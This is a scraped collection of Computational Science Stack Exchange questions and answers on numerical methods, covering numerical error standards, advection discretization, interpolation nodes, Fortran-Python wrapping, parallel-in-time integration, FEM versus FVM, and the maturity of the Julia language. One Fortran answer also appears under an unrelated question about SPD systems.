methods for sparse linear systems (the theory and - to a lesser extent - practice of Krylov methods; also covers preconditioning) | {
"source": [
"https://scicomp.stackexchange.com/questions/3262",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1614/"
]
} |
3,451 | In my field of research the specification of experimental errors is commonly accepted and publications which fail to provide them are highly criticized. At the same time I often find that results of numerical computations are provided without any account of numerical errors, even though (or maybe because) often questionable numerical methods are at work. I am talking about errors which result from discretization and finite precision of numerical computations etc. Sure, these error estimates are not always easy to obtain, such as in the case of hydro-dynamical equations but often it seems to result from laziness while I believe that the specification of numerical error estimates should be standard just as much as they are for experimental results. Hence my question: Are there resources which discuss in some detail the treatment of numerical errors or propose scientific standards for the specification of numerical errors which result from typical approximations such as discretization? | Your question is asking about model Verification. You can find numerous resources on methods and standards by searching for Verification and Validation ( Roache 1997 , 2002 , 2004 , Oberkampf & Trucano 2002 , Salari & Knupp 2000 , Babuska & Oden 2004 ), as well as the broader topic of Uncertainty Quantification . Rather than elaborate on methods, I would like to highlight a community that took a firm stand on the issue. In 1986, Roache, Ghia, and White established the Journal of Fluids Engineering Editorial Policy Statement on the Control of Numerical Accuracy which opens with A professional problem exists in the computational fluid dynamics community and also in the broader area of computational physics. Namely, there is a need for higher standards on the control of numerical accuracy. [...] The problem is certainly not unique to the JFE and came into even sharper focus at the 1980-81 AFOSRHTTM-Stanford Conference on Complex Turbulent Flows. It was a conclusion of that conference's Evaluation Committee that, in most of the submissions to that conference, it was impossible to evaluate and compare the accuracy of different turbulence models, since one could not distinguish physical modeling errors from numerical errors related to the algorithm and grid. This is especially the case for first-order accurate methods and hybrid methods. They conclude with very direct guidelines: The Journal of Fluids Engineering will not accept for publication any paper reporting the numerical solution of a fluids engineering problem that fails to address the task of systematic truncation error testing and accuracy estimation. [...] we must make it clear that a single calculation in a fixed grid will not be acceptable , since it is impossible to infer an accuracy estimate from such a calculation. Also, the editors will not consider a reasonable agreement with experimental data to be sufficient proof of accuracy, especially if any adjustable parameters are involved, as in turbulence modeling. The current version contains a comprehensive set of criteria and represents a standard that, in my opinion, other fields should aspire to match. It is shameful that even today, awareness about the importance of model verification is absent in so many fields. | {
"source": [
"https://scicomp.stackexchange.com/questions/3451",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1943/"
]
} |
5,425 | I am trying to solving the advection equation but have a strange oscillation appearing in the solution when the wave reflects from the boundaries. If anybody has seen this artefact before I would be interested to know the cause and how to avoid it! This is an animated gif, open in separate window to view the animation (it will only play once or not at once it has been cached!) Notice that the propagation seems highly stable until the wave begins to reflect from the first boundary. What do you think could be happening here? I have spend a few days double checking my code and cannot find any errors. It is strange because there seems to be two propagating solutions: one positive and one negative; after the reflection from the first boundary. The solutions seems to be travelling along adjacent mesh points. The implementation details follow. The advection equation, $\frac{\partial u}{\partial t} = \boldsymbol{v}\frac{\partial u}{\partial x}$ where $\boldsymbol{v}$ is the propagation velocity. The Crank-Nicolson is an unconditionally (pdf link) stable discretization for the advection equation provided $u(x)$ is slowly varying in space (only contains low frequencies components when Fourier transformed). The discretization I have applied is, $ \frac{\phi_{j}^{n+1} - \phi_{j}^{n}}{\Delta t} =
\boldsymbol{v} \left[ \frac{1-\beta}{2\Delta x} \left( \phi_{j+1}^{n} - \phi_{j-1}^{n} \right) + \frac{\beta}{2\Delta x} \left( \phi_{j+1}^{n+1} - \phi_{j-1}^{n+1} \right) \right]$ Putting the unknowns on the right-hand side enables this to be written in the linear form, $\beta r\phi_{j-1}^{n+1} + \phi_{j}^{n+1} -\beta r\phi_{j+1}^{n+1} = -(1-\beta)r\phi_{j-1}^{n} + \phi_{j}^{n} + (1-\beta)r\phi_{j+1}^{n}$ where $\beta=0.5$ (to take the time average evenly weighted between the present and future point) and $r=\boldsymbol{v}\frac{\Delta t}{2\Delta x}$. These set of equation have the matrix form $A\cdot u^{n+1} = M\cdot u^n$, where, $
\boldsymbol{A} =
\left(
\begin{matrix}
1 & -\beta r & & & 0 \\
\beta r & 1 & -\beta r & & \\
& \ddots & \ddots & \ddots & \\
& & \beta r & 1 & -\beta r \\
0 & & & \beta r & 1 \\
\end{matrix}
\right)
$ $
\boldsymbol{M} =
\left(
\begin{matrix}
1 & (1 - \beta)r & & & 0 \\
-(1 - \beta)r & 1 & (1 - \beta)r & & \\
& \ddots & \ddots & \ddots & \\
& & -(1 - \beta)r & 1 & (1 - \beta)r \\
0 & & &-(1 - \beta)r & 1 \\
\end{matrix}
\right)
$ The vectors $u^n$ and $u^{n+1}$ are the known and unknown of the quantity we want to solve for. I then apply closed Neumann boundary conditions on the left and right boundaries. By closed boundaries I mean $\frac{\partial u}{\partial x} = 0$ on both interfaces. For closed boundaries it turns out that (I won't show my working here) we just need to solve the above matrix equation. As pointed out by @DavidKetcheson, the above matrix equations actually describe Dirichlet boundary conditions . For Neumann boundary conditions, $
\boldsymbol{A} =
\left(
\begin{matrix}
1 & 0 & & & 0 \\
\beta r & 1 & -\beta r & & \\
& \ddots & \ddots & \ddots & \\
& & \beta r & 1 & -\beta r \\
0 & & & 0 & 1 \\
\end{matrix}
\right)
$ Update The behaviour seems fairly independent of the choice of constants I use, but these are the values for the plot you see above: $\boldsymbol{v}$=2 dx=0.2 dt=0.005 $\sigma$=2 (Gaussian hwhm) $\beta$=0.5 Update II A simulation with non-zero diffusion coefficient, $D=1$ (see comments below), the oscillation goes away, but the wave no longer reflects!? I don't understand why? | The equation you're solving does not permit right-going solutions, so there is no such thing as a reflecting boundary condition for this equation. If you consider the characteristics, you'll realize that you can only impose a boundary condition at the right boundary. You are trying to impose a homogeneous Dirichlet boundary condition at the left boundary, which is mathematically invalid. To reiterate: the method of characteristics says that the solution must be constant along any line of the form $x-\nu t = C$ for any constant $C$ . Thus the solution along the left boundary is determined by the solution at earlier times inside your problem domain; you cannot impose a solution there. Unlike the equation, your numerical scheme does admit right-going solutions. The right-going modes are referred to as parasitic modes and involve very high frequencies. Notice that the right-going wave is a sawtooth wave packet, associated with the highest frequencies that can be represented on your grid. That wave is purely a numerical artifact, created by your discretization. For emphasis: you have not written down the full initial-boundary value problem that you are trying to solve. If you do, it will be clear that it is not a mathematically well-posed problem. I'm glad you posted this here, though, as it's a beautiful illustration of what can happen when you discretize a problem that's not well-posed, and of the phenomenon of parasitic modes. A big +1 for your question from me. | {
"source": [
"https://scicomp.stackexchange.com/questions/5425",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3691/"
]
} |
5,682 | Experiment description: In Lagrange interpolation, the exact equation is sampled at $N$ points (polynomial order $N - 1$ ) and it is interpolated at 101 points. Here $N$ is varied from 2 to 64. Each time $L_1$ , $L_2$ and $L_\infty$ error plots are prepared. It is seen that, when the function is sampled at equi-spaced points, the error drops initially (it happens till $N$ is less than about 15 or so) and then the error goes up with further increase in $N$ . Whereas, if the initial sampling is done at Legendre-Gauss (LG) points (roots of Legendre polynomials), or Legendre-Gauss-Lobatto (LGL) points (roots of Lobatto polynomials), the error drops to machine level and doesn't increase when $N$ is further increased. My questions are, What exactly happens in the case of equi-spaced points? Why does increase in polynomial order cause the error to rise after a certain point? Does this also mean that if I use equi-spaced points for WENO / ENO reconstruction (using Lagrange polynomials), then in the smooth region, I would get errors? (well, these are only hypothetical questions (for my understanding), it is really not reasonable to reconstruct polynomial of the order of 15 or higher for WENO scheme) Additional details: Function approximated: $f(x) = \cos(\frac{\pi}{2}~x)$ , $x \in [-1, 1]$ $x$ divided into $N$ equispaced (and later LG) points. The function is interpolated at 101 points each time. Results: a) Equi-spaced points (interpolation for $N = 65$ ): b) Equi-spaced points (error plot, log scale): a) LG points (Interpolation for $N = 65$ ): b) LG points (error plot, log scale): | The problem with equispaced points is that the interpolation error polynomial, i.e. $$ f(x) - P_n(x) = \frac{f^{(n+1)}(\xi)}{(n+1)!} \prod_{i=0}^n (x - x_i),\quad \xi\in[x_0,x_n] $$ behaves differently for different sets of nodes $x_i$. In the case of equispaced points, this polynomial blows up at the edges. If you use Gauss-Legendre points, the error polynomial is significantly better behaved, i.e. it doesn't blow up at the edges. If you use Chebyshev nodes , this polynomial equioscillates and the interpolation error is minimal. | {
"source": [
"https://scicomp.stackexchange.com/questions/5682",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1567/"
]
} |
6,961 | I would like to use f2py with modern Fortran. In particular I'm trying to get the following basic example to work. This is the smallest useful example I could generate. ! alloc_test.f90
subroutine f(x, z)
implicit none
! Argument Declarations !
real*8, intent(in) :: x(:)
real*8, intent(out) :: z(:)
! Variable Declarations !
real*8, allocatable :: y(:)
integer :: n
! Variable Initializations !
n = size(x)
allocate(y(n))
! Statements !
y(:) = 1.0
z = x + y
deallocate(y)
return
end subroutine f Note that n is inferred from the shape of input parameter x . Note that y is allocated and deallocated within the body of the subroutine. When I compile this with f2py f2py -c alloc_test.f90 -m alloc And then run in Python from alloc import f
from numpy import ones
x = ones(5)
print f(x) I get the following error ValueError: failed to create intent(cache|hide)|optional array-- must have defined dimensions but got (-1,) So I go and create and edit the pyf file manually f2py -h alloc_test.pyf -m alloc alloc_test.f90 Original python module alloc ! in
interface ! in :alloc
subroutine f(x,z) ! in :alloc:alloc_test.f90
real*8 dimension(:),intent(in) :: x
real*8 dimension(:),intent(out) :: z
end subroutine f
end interface
end python module alloc Modified python module alloc ! in
interface ! in :alloc
subroutine f(x,z,n) ! in :alloc:alloc_test.f90
integer, intent(in) :: n
real*8 dimension(n),intent(in) :: x
real*8 dimension(n),intent(out) :: z
end subroutine f
end interface
end python module alloc Now it runs but the values of the output z are always 0 . Some debug printing reveals that n has the value 0 within the subroutine f . I assume that I'm missing some f2py header magic to manage this situation properly. More generally what is the best way to link the above subroutine into Python? I'd strongly prefer not to have to modify the subroutine itself. | I am not super familiar with f2py internals, but I am very familiar with wrapping Fortran. F2py just automates some or all of the things below. You first need to export to C using the iso_c_binding module, as described for example here: http://fortran90.org/src/best-practices.html#interfacing-with-c Disclaimer: I am the main author of the fortran90.org pages. This is the only platform and compiler independent way of calling Fortran from C. This is F2003, so these days there is no reason to use any other way. You can only export/call arrays with full length specified (explicit shape), that is: integer(c_int), intent(in) :: N
real(c_double), intent(out) :: mesh(N) but not assume shape: real(c_double), intent(out) :: mesh(:) That is because the C language does not support such arrays itself. There is talk to include such support in either F2008 or later (I am not sure), and the way it would work is through some supporting C data structures, as you need to carry shape information about the array. In Fortran, you should mainly use the assume shape, only in special cases you should use explicit shape, as described here: http://fortran90.org/src/best-practices.html#arrays That means, that you need to write a simple wrapper around your assume shape subroutine, that will wrap things into explicit shape arrays, per my first link above. Once you have a C signature, just call it from Python in any way you like, I use Cython, but you can use ctype, or C/API by hand. The deallocate(y) statement is not needed, Fortran deallocates automatically. http://fortran90.org/src/best-practices.html#allocatable-arrays real*8 should not be used, but rather real(dp) : http://fortran90.org/src/best-practices.html#floating-point-numbers The statement y(:) = 1.0 is assigning 1.0 in single precision, so the rest of digits will be random! This is a common pitfall: http://fortran90.org/src/gotchas.html#floating-point-numbers You need to use y(:) = 1.0_dp . Instead of writing y(:) = 1.0_dp , you can just write y = 1 , that's it. You can assign integer to a floating point number without losing accuracy, and you don't need to put the redundant (:) in there. Much simpler. Instead of y = 1
z = x + y just use z = x + 1 and don't bother with the y array at all. You don't need the "return" statement at the end of the subroutine. Finally, you should probably be using modules, and just put implicit none on the module level and you don't need to repeat it in each subroutine. Otherwise it looks good to me. Here is the code following the suggestions 1-10 above:: module test
use iso_c_binding, only: c_double, c_int
implicit none
integer, parameter :: dp=kind(0.d0)
contains
subroutine f(x, z)
real(dp), intent(in) :: x(:)
real(dp), intent(out) :: z(:)
z = x + 1
end subroutine
subroutine c_f(n, x, z) bind(c)
integer(c_int), intent(in) :: n
real(c_double), intent(in) :: x(n)
real(c_double), intent(out) :: z(n)
call f(x, z)
end subroutine
end module It shows the simplified subroutine as well as a C wrapper. As far as f2py, it probably tries to write this wrapper for you and fails. I am also not sure whether it is using the iso_c_binding module. So for all these reasons, I prefer to wrap things by hand. Then it's exactly clear what is happening. | {
"source": [
"https://scicomp.stackexchange.com/questions/6961",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/19/"
]
} |
6,965 | I know some of the places where SPD linar systems arises such as elliptic PDEs and normal equations. Can I have a more comprehensive list of scientific applications which require solving SPD linear system. I am specially interested in cases where matrix is not sparse and cases where matrix might not be available directly Thanks | I am not super familiar with f2py internals, but I am very familiar with wrapping Fortran. F2py just automates some or all of the things below. You first need to export to C using the iso_c_binding module, as described for example here: http://fortran90.org/src/best-practices.html#interfacing-with-c Disclaimer: I am the main author of the fortran90.org pages. This is the only platform and compiler independent way of calling Fortran from C. This is F2003, so these days there is no reason to use any other way. You can only export/call arrays with full length specified (explicit shape), that is: integer(c_int), intent(in) :: N
real(c_double), intent(out) :: mesh(N) but not assume shape: real(c_double), intent(out) :: mesh(:) That is because the C language does not support such arrays itself. There is talk to include such support in either F2008 or later (I am not sure), and the way it would work is through some supporting C data structures, as you need to carry shape information about the array. In Fortran, you should mainly use the assume shape, only in special cases you should use explicit shape, as described here: http://fortran90.org/src/best-practices.html#arrays That means, that you need to write a simple wrapper around your assume shape subroutine, that will wrap things into explicit shape arrays, per my first link above. Once you have a C signature, just call it from Python in any way you like, I use Cython, but you can use ctype, or C/API by hand. The deallocate(y) statement is not needed, Fortran deallocates automatically. http://fortran90.org/src/best-practices.html#allocatable-arrays real*8 should not be used, but rather real(dp) : http://fortran90.org/src/best-practices.html#floating-point-numbers The statement y(:) = 1.0 is assigning 1.0 in single precision, so the rest of digits will be random! This is a common pitfall: http://fortran90.org/src/gotchas.html#floating-point-numbers You need to use y(:) = 1.0_dp . Instead of writing y(:) = 1.0_dp , you can just write y = 1 , that's it. You can assign integer to a floating point number without losing accuracy, and you don't need to put the redundant (:) in there. Much simpler. Instead of y = 1
z = x + y just use z = x + 1 and don't bother with the y array at all. You don't need the "return" statement at the end of the subroutine. Finally, you should probably be using modules, and just put implicit none on the module level and you don't need to repeat it in each subroutine. Otherwise it looks good to me. Here is the code following the suggestions 1-10 above:: module test
use iso_c_binding, only: c_double, c_int
implicit none
integer, parameter :: dp=kind(0.d0)
contains
subroutine f(x, z)
real(dp), intent(in) :: x(:)
real(dp), intent(out) :: z(:)
z = x + 1
end subroutine
subroutine c_f(n, x, z) bind(c)
integer(c_int), intent(in) :: n
real(c_double), intent(in) :: x(n)
real(c_double), intent(out) :: z(n)
call f(x, z)
end subroutine
end module It shows the simplified subroutine as well as a C wrapper. As far as f2py, it probably tries to write this wrapper for you and fails. I am also not sure whether it is using the iso_c_binding module. So for all these reasons, I prefer to wrap things by hand. Then it's exactly clear what is happening. | {
"source": [
"https://scicomp.stackexchange.com/questions/6965",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3360/"
]
} |
7,714 | I'm currently looking into parallel methods for ODE integration. There is a lot of new and old literature out there describing a wide range of approaches, but I haven't found any recent surveys or overview articles describing the topic in general. There's the book by Burrage [1], but it's almost 20 years old and hence does not cover many of the more modern ideas like the parareal algorithm. [1] K. Burrage, Parallel and Sequential Methods for Ordinary Differential Equations, Clarendon Press, Oxford, 1995 | I'm not aware of any recent overview articles, but I am actively involved in the development of the PFASST algorithm so can share some thoughts. There are three broad classes of time-parallel techniques that I am aware of: across the method — independent stages of RK or extrapolation integrators can be evaluated in parallel; see also the RIDC (revisionist integral deferred correction algorithm) across the problem — waveform relaxation across the time-domain — Parareal; PITA (parallel in time algorithm); and PFASST (parallel full approximation scheme in space and time). Methods that parallelize across the method usually perform very close to spec but don't scale beyond a handful of (time) processors. Typically they are relatively easier to implement than other methods and are a good if you have a few extra cores lying around and are looking for predictable and modest speedups. Methods that parallelize across the time domain include Parareal, PITA, PFASST. These methods are all iterative and are comprised of inexpensive (but inaccurate) "coarse" propagators and expensive (but accurate) "fine" propagators. They achieve parallel efficiency by iteratively evaluating the fine propagator in parallel to improve a serial solution obtained using the coarse propagator. The Parareal and PITA algorithms suffer from a rather unfortunate upper bound on their parallel efficiency $E$: $E < 1/K$ where $K$ is the number of iterations required to obtain convergence throughout the domain. For example, if your Parareal implementation required 10 iterations to converge and you are using 100 (time) processors, the largest speedup you could hope for would be 10x. The PFASST algorithm relaxes this upper bound by hybridizing the time-parallel iterations with the iterations of the Spectral Deferred Correction time-stepping method and incorporating Full Approximation Scheme corrections to a hierarchy of space/time discretizations. Lots of games can be played with all of these methods to try and speed them up, and it seems as though the performance of these across-the-domain techniques depends on what problem you are solving and which techniques are available for speeding up the coarse propagator (coarsened grids, coarsened operators, coarsened physics etc.). Some references (see also references listed in the papers): This paper demonstrates how various methods can be parallelised across the method: A theoretical comparison of high order explicit Runge-Kutta, extrapolation, and deferred correction methods ; Ketcheson and Waheed. This paper also shows a nice way of parallelizing across the method, and introduces the RIDC algorithm: Parallel high-order integrators ; Christlieb, MacDonald, Ong. This paper introduces the PITA algorithm: A Time-Parallel Implicit Method for Accelerating the Solution of Nonlinear Structural Dynamics Problems ; Cortial and Farhat. There are lots of papers on Parareal (just Google it). Here is a paper on the Nievergelt method: A minimal communication approach to parallel time integration ; Barker. This paper introduces PFASST: Toward an efficient parallel in time method for partial differential equations ; Emmett and Minion; This papers describes a neat application of PFASST: A massively space-time parallel N-body solver ; Speck, Ruprecht, Krause, Emmett, Minion, Windel, Gibbon. I have written two implementations of PFASST that are available on the 'net: PyPFASST and libpfasst . | {
"source": [
"https://scicomp.stackexchange.com/questions/7714",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4230/"
]
} |
8,217 | There is an obvious difference between finite difference and the finite volume method (moving from point definition of the equations to integral averages over cells). But I find FEM and FVM to be very similar; they both use integral form and average over cells. What is the FEM method doing that the FVM is not? I have read a little background on the FEM I understand that the equations are written in the weak form, this gives the method a slightly different stating point than the FVM. However, I don't understand on a conceptual level what the differences are. Does FEM make some assumption regarding how the unknown varies inside the cell, can't this also be done with FVM? I am mostly coming from 1D perspective so maybe FEM has advantages with more than one dimension? I haven't found much information available on this topic on the net. Wikipedia has a section on how the FEM is different from finite difference method, but that is about it, http://en.wikipedia.org/wiki/Finite_element_method#Comparison_to_the_finite_difference_method . | Finite Element: volumetric integrals, internal polynomial order Classical finite element methods assume continuous or weakly continuous approximation spaces and ask for volumetric integrals of the weak form to be satisfied. The order of accuracy is increased by raising the approximation order within elements. The methods are not exactly conservative, thus often struggle with stability for discontinuous processes. Finite Volume: surface integrals, fluxes from discontinuous data, reconstruction order Finite volume methods use piecewise constant approximation spaces and ask for integrals against piecewise constant test functions to be satisfied. This yields exact conservation statements. The volume integral is converted to a surface integral and the entire physics is specified in terms of fluxes in those surface integrals. For first-order hyperbolic problems, this is a Riemann solve. Second order/elliptic fluxes are more subtle. Order of accuracy is increased by using neighbors to (conservatively) reconstruct higher order representations of the state inside elements (slope reconstruction/limiting) or by reconstructing fluxes (flux limiting). The reconstruction process is usually nonlinear to control oscillations around discontinuous features of the solution, see total variation diminishing (TVD) and essentially non-oscillatory (ENO/WENO) methods. A nonlinear discretization is necessary to simultaneously obtain both higher than first order accuracy in smooth regions and bounded total variation across discontinuities, see Godunov's theorem . Comments Both FE and FV are easy to define up to second order accuracy on unstructured grids. FE is easier to go beyond second order on unstructured grids. FV handles non-conforming meshes more easily and robustly. Combining FE and FV The methods can be married in multiple ways. Discontinuous Galerkin methods are finite element methods that use discontinuous basis functions, thus acquiring Riemann solvers and more robustness for discontinuous processes (especially hyperbolic). DG methods can be used with nonlinear limiters (usually with some reduction in accuracy), but satisfy a cell-wise entropy inequality without limiting and can thus be used without limiting for some problems where other schemes require limiters. (This is especially useful for adjoint-based optimization since it makes the discrete adjoint more representative of the continuous adjoint equations.) Mixed FE methods for elliptic problems use discontinuous basis functions and after some choices of quadrature, can be reinterpreted as standard finite volume methods, see this answer for more. Reconstruction DG methods (aka. $P_N P_M$ or "Recovery DG") use both FV-like conservative reconstruction and internal order enrichment, and are thus a superset of FV and DG methods. | {
"source": [
"https://scicomp.stackexchange.com/questions/8217",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3691/"
]
} |
8,223 | I would like to know if there is a quick way to compute the Euclidean distance of two vectors in Octave. It seems that there is no special function for that, so should I just use the formula with sqrt ? | The Euclidean distance between two vectors is the two-norm of their difference, hence d = norm( x1 - x2 , 2 ); should do the trick in Octave. Note that if the second argument to norm is omitted, the 2-norm is used by default. | {
"source": [
"https://scicomp.stackexchange.com/questions/8223",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4958/"
]
} |
8,404 | I need to write some data from a computation, that will be read later by Paraview (.vtu or vtk file). When it comes to file size , should I go for the ASCII format or the Binary format ? | If your only worry is file size, then you want binary files. For an illustrative example, lets assume you are writing 1 double precision floating point number to a file. Let's assume that the file system can handle this perfectly and holding the file, headers, and padding are all 0. For a binary file, that number would take the exact size of the number in RAM, or 8 bytes. In ASCII format, it would hold: 16 digits of the base 1 period for the decimal 1 char to delimit the exponent 1 char for the sign of the exponent 2-3 char for the exponent Assuming it uses only 1 byte for a character, That is 22 bytes to hold the same number. This doesn't count the characters required to dilimit between numbers (usually atleast 1). Therefore file size for ASCII format will be about 3 times larger. You can trade in file size for the precision in the stored files (only keep 5-6 digits in the base), but that depends on what you are using them for. The main advantage of ASCII is for debugging or producing human readable data. | {
"source": [
"https://scicomp.stackexchange.com/questions/8404",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4964/"
]
} |
8,998 | I apologize if this is a vague question, but here goes: Over the past few years, functional programming has received a lot of attention in the Software Engineering community. Many have started using languages such as Scala and Haskell and claimed success over other programming languages and paradigms. My question is: as high performance computing / scientific computing experts, should we be interested in functional programming? Should we be participating in this mini-revolution? What are the pros and cons of functional programming in the SciComp domain of work? | I've only done a little bit of functional programming, so take this answer with a grain of salt. Pros: Functional programming looks very mathematical; it's a nice paradigm for expressing some mathematical concepts There are good libraries available for things like formal verification of programs and theorem proving, so it's possible to write programs that reason about programs -- this aspect is good for reproducibility You can do functional programming in Python and C++ via lambda expressions; you can also do functional programming in Julia and Mathematica Not many people use it, so you can be a pioneer. Much like there were early adopters of MATLAB, Python, R, and now Julia, there need to be early adopters of functional programming for it to catch on Cons: Languages that are typically thought of as functional programming languages, like Haskell, OCaml (and other ML dialects), and Lisp are generally thought of as slow relative to languages used for performance-critical scientific computing. OCaml is, at best, around half as fast as C. These languages lack library infrastructure compared to languages commonly used in computational science (Fortran, C, C++, Python); if you want to solve a PDE, it's way easier to do it in a language more commonly used in computational science than one that is not. There isn't as much of a computational science community using functional programming languages as there is using procedural languages, which means you won't get a whole lot of help learning it or debugging it, and people are probably going to give you crap for using it (whether or not you deserve it) The style of functional programming is different than the style used in procedural programming, which is typically taught in introductory computer science classes and in "MATLAB for Scientists and Engineers"-type classes I think many of the objections in the "Cons" section could be overcome. As is a common point of discussion on this Stack Exchange site, developer time is more important than execution time. Even if functional programming languages are slow, if performance-critical portions can be delegated to a faster procedural language and if productivity gains can be demonstrated through rapid application development, then they might be worth using. It's worth noting here that programs implemented in pure Python, pure MATLAB, and pure R are considerably slower than implementations of these same programs in C, C++, or Fortran. Languages like Python, MATLAB, and R are popular precisely because they trade execution speed for productivity, and even then, Python and MATLAB both have facilities for implementing interfaces to compiled code in C or C++ so that performance-critical code can be implemented to execute quickly. Most languages have a foreign function interface to C, which would be enough to interface with most libraries of interest to computational scientists. Should you be interested in functional programming? That all depends on what you think is cool. If you're the type of person who is willing to buck convention and you're willing to go through the slog of evangelizing to people about the virtues of whatever it is you want to do with functional programming, I'd say go for it. I would love to see people do cool things with functional programming in computational science, if for no other reason than to prove all of the naysayers wrong (and there will be a lot of naysayers). If you're not the type of person who wants to deal with a bunch of people asking you, "Why in hell are you using a functional programming language instead of (insert their favorite procedural programming language here)?", then I wouldn't bother. There's been some use of functional programming languages for simulation-intensive work. The quantitative trading firm Jane Street uses OCaml for financial modeling and execution of its trading strategies. OCaml was also used in FFTW for generating some C code used in the library. Liszt is a domain-specific language developed at Stanford and implemented in Scala that is used for solving PDEs. Functional programming is definitely used in industry (not necessarily in computational science); it remains to be seen whether it will take off in computational science. | {
"source": [
"https://scicomp.stackexchange.com/questions/8998",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/529/"
]
} |
10,678 | I just started studying FEM in a more structured basis compared to what I used to do during my undergraduate courses. I am doing this because, despite the fact that I can use the "FEM" in commercial (and other non-commercial) software, I would like to really understand the underground techniques that support the method. That's why I am coming here with such, at least for the experienced user of the technique, basic question. Now I'm reading a quite popular (I think) and "engineer-friendly" book called "Finite element method- The basics" from Zienkwicz. I've been reading this book from the first page but I yet can't understand the concept of shape function in the way Zienkwicz explains it. What I know about from the things that I'd read is that a "Stiffness" matrix, the one that relates the unknowns with the result ($A$ in: $Ak=b$), has its components from the "relationships between the nodes", and if that "relationship" changes, (i.e. if we change it to a Higher order interpolant), that stiffness matrix changes, because the relationship between the nodes does. But in this book, the definition is quite fuzzy for me, because in some point it says that you can arbitrarily chose the function as, i.e., the identity matrix: The only explanation I found is in this blog , but it is still not so clear for me. So, somebody can give me a simple plain explanation of what is a Shape functon and how it is done to "put it" in the stifness matrix? | I've always found the approach to describing finite element methods that focuses on the discrete linear system and works backward unnecessarily confusing. It is much clearer to go the other way, even if that involves a bit of mathematical notation in the beginning (which I'll try to keep to a minimum). Assume that you are trying to solve an equation $A u = f$ for given $f$ and unknown $u$ , where $A$ is a linear operator that maps functions (e.g., describing the displacement at every point $(x,y)$ in a domain) in a space $V$ to functions in another space (e.g., describing the applied forces). Since the function space $V$ is usually infinite-dimensional, this system cannot be solved numerically. The standard approach is therefore to replace $V$ by a finite-dimensional subspace $V_h$ and look for $u_h \in V_h$ satisfying $Au_h = f$ . This is still infinite-dimensional due to the range space (which we'll assume for simplicity to be $V$ as well), so we just ask for the residual $Au_h-f\in V$ to be orthogonal to $V_h$ -- or equivalently, that $v_h^T(Au_h-f) = 0$ for every basis vector $v_h$ in $V_h$ . If we now write the $u_h$ as a linear combination of these basis vectors, we are left with a linear system for the unknown coefficients in this combination. (The terms $v_i^TAu_j$ are exactly the entries of the stiffness matrix $K_{ij}$ , and $v_j^Tf$ are the entries of the load vector. If $A$ is a differential operator, one usually performs integration by parts at some point, but this is not important here.) None of this so far is specific to finite element methods, but applies to any so-called Galerkin method or method of weighted residuals.
The finite element method is characterized by a special choice of $V_h$ : The computational domain is decomposed into a number of elements of the same basic shape (e.g., triangles; the process is often called triangulation ), and the space $V_h$ is chosen such that restricted to each element, functions in $V_h$ are polynomials (e.g, linear in $x$ and $y$ ). Furthermore, the basis functions are chosen such that they are non-zero only in (the neighborhood of) one of the elements. The point of this choice is that you can build such a basis of $V_h$ fairly easily by finding a basis $\{\psi_j\}$ of the polynomial space on a single reference element (such as the triangle with vertices $(0,0)$ , $(0,1)$ and $(1,0)$ ) and then using an affine transformation to map these basis functions to basis functions on each element in the triangulation. These $\psi_j$ are the shape functions. Usually, one requires that the local basis functions take the value $1$ at only one of the vertices and $0$ at the others (called a nodal basis ), which is what the page you linked is talking about. Like any polynomial, these are uniquely determined by a number of interpolation conditions (e.g., a polynomial of degree $1$ on an interval is determined by its value at two distinct points; if the basis is a nodal basis, these values are taken at the vertices), which are also referred to as the degrees of freedom of the element. (The total degrees of freedom can be less than the sum of the degrees of all elements if some have to be fixed to ensure global properties of the approximation such as continuity.) (Other choices of $V_h$ lead to other methods; in fact, there are spectral methods where the basis functions are chosen such that the stiffness matrix is the identity. Of course, there's no free lunch, so other parts of the procedure become more difficult with this basis. Similarly, there are other interpolation conditions than point evaluations, such as derivative evaluations or averages over elements or sides.) | {
"source": [
"https://scicomp.stackexchange.com/questions/10678",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/5083/"
]
} |
10,922 | I'm considering learning a new language to use for numerical/simulation modelling projects, as a (partial) replacement for the C++ and Python that I currently use. I came across Julia , which sounds kind of perfect. If it does everything it claims, I could use it to replace both C++ and Python in all my projects, since it can access high-level scientific computing library code (including PyPlot) as well as running for loops at a similar speed to C. I would also benefit from things like proper coroutines that don't exist in either of the other languages. However, it's a relatively new project, currently at version 0.x, and I found various warnings (posted at various dates in the past) that it's not quite ready for the day to day use. Consequently, I would like some information about the status of the project right now (February 2014, or whenever an answer is posted), in order to help me assess whether I personally should consider investing the time to learn this language at this stage. I would appreciate answers that focus on specific relevant facts about the Julia project ; I'm less interested in opinions based on experience with other projects. In particular, a comment by Geoff Oxberry suggests that the Julia API is still in a state of flux, requiring the code to be updated when it changes. I would like to get an idea of the extent to which this is the case: which areas of the API are stable, and which are likely to change? I guess typically I would mostly be doing linear algebra (e.g. solving eigenproblems), numerical integration of ODEs with many variables, and plotting using PyPlot and/or OpenGL, as well as low-level C-style number crunching (e.g. for Monte Carlo simulations). Is Julia's library system fully developed in these areas? In particular, is the API more or less stable for those types of activities, or would I find that my old code would tend to break after upgrading to a new version of Julia? Finally, are there any other issues that would be worth considering in deciding whether to use Julia for serious work at the present time? | Julia, at this point (May 2019, Julia v1.1 with v1.2 about to come out) is quite mature for scientific computing. The v1.0 release signified an end to yearly code breakage . With that, a lot of scientific computing libraries have had the time to simply grow without disruption. A broad overview of Julia packages can be found at pkg.julialang.org . For core scientific computing, the DifferentialEquations.jl library for differential equations (ODEs, SDEs, DAEs, DDEs, Gillespie simulations, etc.), Flux.jl for neural networks, and the JuMP library for mathematical programming (optimization: linear, quadratic, mixed integer, etc. programming) are three of the cornerstones of the scientific computing ecosystem. The differential equation library in particular is far more developed than what you'd see in other languages, with a large development team implementing features like EPIRK integrators , Runge-Kutta-Nystrom , Stiff/Differential-Algebraic delay differential equation , and adaptive time stiff stochastic differential equation integrators, along with a bunch of 